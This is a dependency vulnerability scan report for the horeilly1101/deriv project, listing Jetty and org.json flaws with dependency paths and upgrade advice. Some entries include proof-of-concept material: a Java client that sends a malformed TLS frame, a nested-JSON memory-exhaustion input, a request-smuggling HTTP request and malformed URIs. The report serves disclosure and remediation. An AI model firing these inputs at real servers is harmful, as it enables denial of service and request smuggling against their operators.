horeilly1101/deriv
Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to Denial of Service (DoS) via the ThreadLimitHandler.getRemote() method. An attacker can exhaust the server's memory and trigger OutofMemory errors by repeatedly sending crafted requests.
Workaround
This vulnerability can be mitigated by not using ThreadLimitHandler and considering the use of QoSHandler instead to artificially limit resource utilization.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 9.4.56, 10.0.24, 11.0.24, 12.0.9 or higher.
References
high severity
- Vulnerable module: org.eclipse.jetty:jetty-webapp
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
Overview
org.eclipse.jetty:jetty-webapp is a maven plugin for Jetty web application support.
Affected versions of this package are vulnerable to Privilege Escalation. The system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.
Remediation
Upgrade org.eclipse.jetty:jetty-webapp to version 9.4.33.v20201020, 10.0.0.beta3, 11.0.0.beta3 or higher.
References
high severity
- Vulnerable module: org.eclipse.jetty:jetty-http
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
…and 2 more
Overview
org.eclipse.jetty:jetty-http is an is a http module for jetty server.
Affected versions of this package are vulnerable to Denial of Service (DoS) in the MetaDataBuilder.checkSize function. An attacker provide a very large or negative length value for the HTTP/2 HPACK header values. This can lead to an integer overflow, resulting in a very large buffer allocation on the server.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.eclipse.jetty:jetty-http to version 9.4.53.v20231009, 10.0.16, 11.0.16 or higher.
References
high severity
- Vulnerable module: org.eclipse.jetty:jetty-io
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-common@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-common@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429 › org.eclipse.jetty:jetty-io@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
…and 9 more
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS). CPU usage can reach 100% upon receiving a large invalid TLS frame.
PoC
// server
public class MyServer {
public static void startServer() throws Exception {
SslContextFactory sslContextFactory = new SslContextFactory.Server();
HttpConnectionFactory httpFactory = new HttpConnectionFactory();
Server server = new Server();
ServerConnector connector = new
ServerConnector(server,null,null,null,1,-1,AbstractConnectionFactory.getFactories(sslContextFactory ,httpFactory));
connector.setPort(9988);
connector.setHost("localhost");
server.setConnectors(new Connector[]{connector});
ServletContextHandler context = new ServletContextHandler();
context.setContextPath("/");
HandlerCollection handlerCollection= new HandlerCollection();
handlerCollection.setHandlers(new Handler[]{context,new DefaultHandler()});
server.setHandler(handlerCollection);
server.start();
server.join();
}
public static void main(String[] args) throws Exception {
startServer();
}
}
public class MyClient {
// client
private static byte[] buildMessage() {
byte[] bytes = new byte[20005];
bytes[0] = 22; // record type
bytes[1] = 3; // major version
bytes[2] = 3; // minor version
bytes[3] = 78; // record length 2 bytes
bytes[4] = 32; // record length
bytes[5] = 1; // message type
bytes[6] = 0; // message length 3 bytes
bytes[7] = 78;
bytes[8] = 23;
for( int i = 9; i < bytes.length; i++) {
bytes[i] = 1;
}
return bytes;
}
public static void sendMessage() throws Exception {
byte[] bytes = buildMessage();
SocketFactory socketFactory = SocketFactory.getDefault();
Socket socket = socketFactory.createSocket("localhost",9988);
socket.getOutputStream().write(bytes);
socket.close();
}
public static void main(String[] args) throws Exception {
sendMessage();
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.eclipse.jetty:jetty-io to version 9.4.39.v20210325, 10.0.2, 11.0.2 or higher.
References
high severity
- Vulnerable module: org.json:json
- Introduced through: org.json:json@20180813
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › org.json:json@20180813Remediation: Upgrade to org.json:json@20231013.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can cause indefinite amounts of memory to be used by inputting a string of modest size. This can lead to a Denial of Service.
PoC
package orgjsonbug;
import org.json.JSONObject;
/**
* Illustrates a bug in JSON-Java.
*/
public class Bug {
private static String makeNested(int depth) {
if (depth == 0) {
return "{\"a\":1}";
}
return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
}
public static void main(String[] args) {
String input = makeNested(30);
System.out.printf("Input string has length %d: %s\n", input.length(), input);
JSONObject output = new JSONObject(input);
System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
}
}
Remediation
Upgrade org.json:json to version 20231013 or higher.
References
high severity
- Vulnerable module: org.json:json
- Introduced through: org.json:json@20180813
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › org.json:json@20180813Remediation: Upgrade to org.json:json@20230227.
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) in the XML.toJSONObject component via crafted JSON or XML data.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.json:json to version 20230227 or higher.
References
medium severity
- Vulnerable module: org.eclipse.jetty:jetty-http
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
…and 2 more
Overview
org.eclipse.jetty:jetty-http is an is a http module for jetty server.
Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input via the HttpURI class due to insufficient validation on the authority segment of a URI. An attacker can manipulate the URI parsing to redirect requests or initiate server-side requests to unintended destinations by supplying malformed URIs that bypass validation checks.
Notes:
This is only exploitable if the application uses decoded user data as encoded URIs in conjunction with the
HttpURIclass used directly;The Jetty usage of the
HttpURIclass is not vulnerable.
Workaround
This vulnerability can be mitigated by not passing decoded user data as encoded URIs to any URI class/method, including HttpURI.
PoC
http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/
Remediation
Upgrade org.eclipse.jetty:jetty-http to version 9.4.57.v20241219, 12.0.12 or higher.
References
medium severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input via the HttpURI class due to insufficient validation on the authority segment of a URI. An attacker can manipulate the URI parsing to redirect requests or initiate server-side requests to unintended destinations by supplying malformed URIs that bypass validation checks.
Notes:
This is only exploitable if the application uses decoded user data as encoded URIs in conjunction with the
HttpURIclass used directly;The Jetty usage of the
HttpURIclass is not vulnerable.
Workaround
This vulnerability can be mitigated by not passing decoded user data as encoded URIs to any URI class/method, including HttpURI.
PoC
http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 9.4.57.v20241219, 12.0.12 or higher.
References
medium severity
- Vulnerable module: org.eclipse.jetty:jetty-http
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
…and 2 more
Overview
org.eclipse.jetty:jetty-http is an is a http module for jetty server.
Affected versions of this package are vulnerable to Improper Handling of Length Parameter Inconsistency via the HttpParser.java component due to accepting the + character proceeding the content-length value in a HTTP/1 header field. An attacker can use jetty in combination with a server that does not close the connection after rejecting such request and after sending a 400 response. This could result in request smuggling.
PoC
POST / HTTP/1.1
Host: a.com
Content-Length: +16
Connection: close
0123456789abcdef
Remediation
Upgrade org.eclipse.jetty:jetty-http to version 9.4.52.v20230823, 10.0.16, 11.0.16, 12.0.1 or higher.
References
medium severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to Denial of Service (DoS). When Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 9.4.37.v20210219, 10.0.1, 11.0.1 or higher.
References
medium severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to Denial of Service (DoS) such that servlets with multipart support (e.g. annotated with @MultipartConfig) that call HttpServletRequest.getParameter() or HttpServletRequest.getParts() may cause OutOfMemoryError when the client sends a multipart request with a part that has a name but no filename and very large content.
Note: This happens even with the default settings of fileSizeThreshold=0, which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw OutOfMemoryError. However, the server may be able to recover after the OutOfMemoryError and continue its service -- although it may take some time.
Workaround
Users unable to upgrade can set the multipart parameter maxRequestSize, which must be set to a non-negative value.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.
References
medium severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
